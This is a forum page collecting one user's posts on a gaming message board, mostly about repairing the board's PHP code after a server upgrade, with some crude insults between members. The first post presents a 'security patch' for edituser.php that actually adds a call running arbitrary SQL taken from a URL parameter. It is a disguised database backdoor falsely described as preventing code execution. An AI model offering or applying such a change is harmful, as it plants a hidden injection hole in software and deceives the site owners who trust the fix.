 New link in the top of page "IRC Chat". |
| Register | Login | |||||
 |
Main
| Memberlist
| Active users
| Calendar
| Last Posts
| IRC Chat
| Online users Ranks | FAQ | XPW | Stats | Color Chart | Photo album |
|
| | ||
New link in the top of page "IRC Chat". |
| Register | Login | |||||
|
Main
| Memberlist
| Active users
| Calendar
| Last Posts
| IRC Chat
| Online users Ranks | FAQ | XPW | Stats | Color Chart | Photo album |
|
| | ||
| Xeogaming Forums - - Posts by Xkeeper |
| Pages: 1 2 |
| User | Post | |||||||||||||||||||||||||||||
Xkeeper        Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| Find:
if($_POST[action]=='saveprofile'){ Replace with: if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){ This should prevent people from executing arbitary code through it  (Last edited by Xkeeper_ on 09-14-06 11:26 AM) |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| edituser.php. | ||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| Of course it's going to do nothing, security patches usually don't show any change in board operation (unless you're trying something).
Seriously, that's probably the major hole as it ghas no sort of check to make sure that you aren't loading edituser via a malicious form someone set up for you. |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
Would I use it myself if it didn't fix things? Jeez...
 |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| Not off the top of my head, no. | ||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
Originally posted by Xeodeus but I like spam!  |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| I know how it'll turn out.
Ha ha another reality TV show dies. |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| Seems that a few things broke boards on the upgrade to PHP5 and MySQL5... the stuff I added in should fix that.
If there's anything else still broken, just let me know and I can go ahead and try to fix it (depending on how long I have access to the files  )
But yeah, the important bits should be working now, at least. |
||||||||||||||||||||||||||||||
|
Xkeeper Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days |
| |||||||||||||||||||||||||||||
| Yeah, I heard you guys were having some problems (as everyone on fiftypounds (of trash) is)
register_globals and MySQL5 combine to make them break horribly |
||||||||||||||||||||||||||||||
(restricted)|
Xkeeper |
Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days
|
'quotes' 'are' 'no' 'longer' 'broken'
|
Erkdog you are a still a fucking moron
Xkeeper |
Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days
|
Originally posted by Thexare BlademoonOriginally posted by Xkeeper_ I mean, he's gotten *worse* over time. That's the really amazing part. (restricted) |
Xkeeper |
Since: 09-14-06 Since last post: 5699 days Last activity: 5065 days
|
I see Insectduel hasn't changed any |
Don't worry, the hate's mutual
Aside from that, if there's one thing that I got out of fixing this place, it's the porn forum! ... 
(Kidding, really) (restricted) | (restricted) | (restricted) | (restricted) | (restricted) | (restricted) | | |||||||||||||||
| Pages: 1 2 |
| Xeogaming Forums - - Posts by Xkeeper |
